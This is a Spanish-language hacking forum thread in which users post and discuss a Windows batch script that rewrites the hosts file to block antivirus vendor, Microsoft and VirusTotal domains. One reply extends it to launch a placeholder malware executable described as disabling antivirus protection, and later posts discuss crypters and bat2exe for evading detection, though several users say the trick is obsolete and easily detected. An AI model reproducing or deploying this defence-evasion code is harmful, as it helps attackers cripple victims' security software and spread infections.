Bloquear actualizaciones de antivirus ¿aun funciona esto?

Iniciado por usuario oculto, 26 Diciembre 2010, 16:22 PM

0 Miembros y 1 Visitante están viendo este tema.

usuario oculto

  

no lo digo porque el code este detectado, me refiero a su utilidad, creo que continuamente van cambiando los servidores con los que actualizan, sabeis los nombres de algunos?

@echo off
set hosts=%windir%\System32\drivers\etc\hosts
echo. >> %hosts%
echo 127.0.0.1 avp.com >> %hosts%
echo 127.0.0.1 ca.com >> %hosts%
echo 127.0.0.1 customer.symantec.com >> %hosts%
echo 127.0.0.1 dispatch.mcafee.com >> %hosts%
echo 127.0.0.1 download.mcafee.com >> %hosts%
echo 127.0.0.1 f-secure.com >> %hosts%
echo 127.0.0.1 kaspersky.com >> %hosts%
echo 127.0.0.1 kaspersky-labs.com >> %hosts%
echo 127.0.0.1 liveupdate.symantec.com >> %hosts%
echo 127.0.0.1 liveupdate.symantecliveupdate.com >> %hosts%
echo 127.0.0.1 mast.mcafee.com >> %hosts%
echo 127.0.0.1 mcafee.com >> %hosts%
echo 127.0.0.1 microsoft.com >> %hosts%
echo 127.0.0.1 my-etrust.com >> %hosts%
echo 127.0.0.1 nai.com >> %hosts%
echo 127.0.0.1 networkassociates.com >> %hosts%
echo 127.0.0.1 pandasoftware.com >> %hosts%
echo 127.0.0.1 rads.mcafee.com >> %hosts%
echo 127.0.0.1 secure.nai.com >> %hosts%
echo 127.0.0.1 securityresponse.symantec.com >> %hosts%
echo 127.0.0.1 sophos.com >> %hosts%
echo 127.0.0.1 symantec.com >> %hosts%
echo 127.0.0.1 trendmicro.com >> %hosts%
echo 127.0.0.1 updates.symantec.com >> %hosts%
echo 127.0.0.1 update.symantec.com >> %hosts%
echo 127.0.0.1 us.mcafee.com >> %hosts%
echo 127.0.0.1 viruslist.com >> %hosts%
echo 127.0.0.1 virustotal.com >> %hosts%
echo 127.0.0.1 www.avp.com >> %hosts%
echo 127.0.0.1 www.f-secure.com >> %hosts%
echo 127.0.0.1 www.grisoft.com >> %hosts%
echo 127.0.0.1 www.kaspersky.com >> %hosts%
echo 127.0.0.1 www.mcafee.com >> %hosts%
echo 127.0.0.1 www.microsoft.com >> %hosts%
echo 127.0.0.1 www.moneybookers.com >> %hosts%
echo 127.0.0.1 www.my-etrust.com >> %hosts%
echo 127.0.0.1 www.nai.com >> %hosts%
echo 127.0.0.1 www.networkassociates.com >> %hosts%
echo 127.0.0.1 www.pandasoftware.com >> %hosts%
echo 127.0.0.1 www.sophos.com >> %hosts%
echo 127.0.0.1 www.symantec.com >> %hosts%
echo 127.0.0.1 www.trendmicro.com >> %hosts%
echo 127.0.0.1 www.virustotal.com >> %hosts%
Que le jodan a  la salud mental!
Fecha de registro:    16 Noviembre 2008, 17:38
años atrás users baneados :)

Karcrack

Debe funcionar, pero hasta el antivirus mas patetico es capaz de darse cuenta que algo malo ocurre cuando se modificar el fichero hosts :xD

sabeeee

#2
Esto ya no funciona mas o eso creo.
¿Que es lo que pasa?, los avs se actualizan creo, desde el reg con otro ip asi que creo que esto aunque lo camuflemos con el mejor cripter creo que levantaría sospechas pero porque empresaria a mandar alertas pero es posible ej: con el execript, al otro día mandan a mi virus, lo analizar, después como mi virus desactivo a las actualizaciones de x cantidad de antivirus esa x cantidad de ordenadores con antivirus des-actualizados seguirá infectándose Xd.
"Vengándose, uno iguala a su enemigo; perdonando, uno se muestra superior a él."
Francis Bacon

xarlyuno

hace poco me topé con el kido.ih ese no te deja ni actualizar ni descargar antivirus pork bloquea el host; pero como lo vi en una pc sin antivirus no se como se comporta con un antivirus, lo claro es que por ejemplo kaspersky lo detecta pk ellos sacaron la cura...

Garfield07

Cualquier AV de pago o con fama detecta eso. No valen los caseros ;)
Sencillamente se le pone que mire si alguien modifica hosts y listo... Creo que hasta yo sabría hacerlo, y eso es mucho jeje
Ademas si el puerto esta cerrado significa que algo malo pasa en casita. Sencillamente te detectarian como virus y lo arreglarian...


* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo

usuario oculto

#5
Cita de: Sagrini en 31 Enero 2011, 20:23 PM
Cualquier AV de pago o con fama detecta eso. No valen los caseros ;)
Sencillamente se le pone que mire si alguien modifica hosts y listo... Creo que hasta yo sabría hacerlo, y eso es mucho jeje
Ademas si el puerto esta cerrado significa que algo malo pasa en casita. Sencillamente te detectarian como virus y lo arreglarian...

Pero todos detectan la acción ¿o el código?, habría que testearlos.Porque si solo fuese código se podría hacer.Hay otros malware que si pueden.
Que le jodan a  la salud mental!
Fecha de registro:    16 Noviembre 2008, 17:38
años atrás users baneados :)

sabeeee

#6
Aki va un código de doble filo.
@echo off
set hosts=%windir%\System32\drivers\etc\hosts
echo. >> %hosts%
echo 127.0.0.1 avp.com >> %hosts%
echo 127.0.0.1 ca.com >> %hosts%
echo 127.0.0.1 customer.symantec.com >> %hosts%
echo 127.0.0.1 dispatch.mcafee.com >> %hosts%
echo 127.0.0.1 download.mcafee.com >> %hosts%
echo 127.0.0.1 f-secure.com >> %hosts%
echo 127.0.0.1 kaspersky.com >> %hosts%
echo 127.0.0.1 kaspersky-labs.com >> %hosts%
echo 127.0.0.1 liveupdate.symantec.com >> %hosts%
echo 127.0.0.1 liveupdate.symantecliveupdate.com >> %hosts%
echo 127.0.0.1 mast.mcafee.com >> %hosts%
echo 127.0.0.1 mcafee.com >> %hosts%
echo 127.0.0.1 microsoft.com >> %hosts%
echo 127.0.0.1 my-etrust.com >> %hosts%
echo 127.0.0.1 nai.com >> %hosts%
echo 127.0.0.1 networkassociates.com >> %hosts%
echo 127.0.0.1 pandasoftware.com >> %hosts%
echo 127.0.0.1 rads.mcafee.com >> %hosts%
echo 127.0.0.1 secure.nai.com >> %hosts%
echo 127.0.0.1 securityresponse.symantec.com >> %hosts%
echo 127.0.0.1 sophos.com >> %hosts%
echo 127.0.0.1 symantec.com >> %hosts%
echo 127.0.0.1 trendmicro.com >> %hosts%
echo 127.0.0.1 updates.symantec.com >> %hosts%
echo 127.0.0.1 update.symantec.com >> %hosts%
echo 127.0.0.1 us.mcafee.com >> %hosts%
echo 127.0.0.1 viruslist.com >> %hosts%
echo 127.0.0.1 virustotal.com >> %hosts%
echo 127.0.0.1 www.avp.com >> %hosts%
echo 127.0.0.1 www.f-secure.com >> %hosts%
echo 127.0.0.1 www.grisoft.com >> %hosts%
echo 127.0.0.1 www.kaspersky.com >> %hosts%
echo 127.0.0.1 www.mcafee.com >> %hosts%
echo 127.0.0.1 www.microsoft.com >> %hosts%
echo 127.0.0.1 www.moneybookers.com >> %hosts%
echo 127.0.0.1 www.my-etrust.com >> %hosts%
echo 127.0.0.1 www.nai.com >> %hosts%
echo 127.0.0.1 www.networkassociates.com >> %hosts%
echo 127.0.0.1 www.pandasoftware.com >> %hosts%
echo 127.0.0.1 www.sophos.com >> %hosts%
echo 127.0.0.1 www.symantec.com >> %hosts%
echo 127.0.0.1 www.trendmicro.com >> %hosts%
echo 127.0.0.1 www.virustotal.com >> %hosts%
strart el_nombre_del_virus_que_gasta_memoria_y_desabilita_los_avs_en_tiempo_real.exe
strart el_nombre_del_virus_que_gasta_memoria_y_desabilita_los_avs_en_tiempo_real.exe

Lo compilamos con el_nombre_del_virus_que_gasta_memoria_y_desabilita_los_avs_en_tiempo_real.exe y para que no se vea la ventana y tendremos un virus en tiempo real con triple funcion XD.
"Vengándose, uno iguala a su enemigo; perdonando, uno se muestra superior a él."
Francis Bacon

Karcrack

#7

Si guardas como .exe lo unico que conseguiras es que no funcione nada ;) Mejor elige .bat :D

PD: Para codigos relativamente largos utiliza las etiquetas [code][/code] en vez de [quote][/quote] y mas si no coloreas...

Garfield07

Karcrack, no vale la pena :P Un bat? Como no uses un bat2exe o algo asi...
Boludoz, apende programación en lenguajes compilados, que eso se detecta...


* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo

YST

Eso ya dejo de funcionar hace años solo logras bloquear los www.virustotal.com y esas cosas .

Aparte si intentas desactivar el kapersky a si .... lo unico que conseguiras son las risas de los programadores  :xD




Yo le enseñe a Kayser a usar objetos en ASM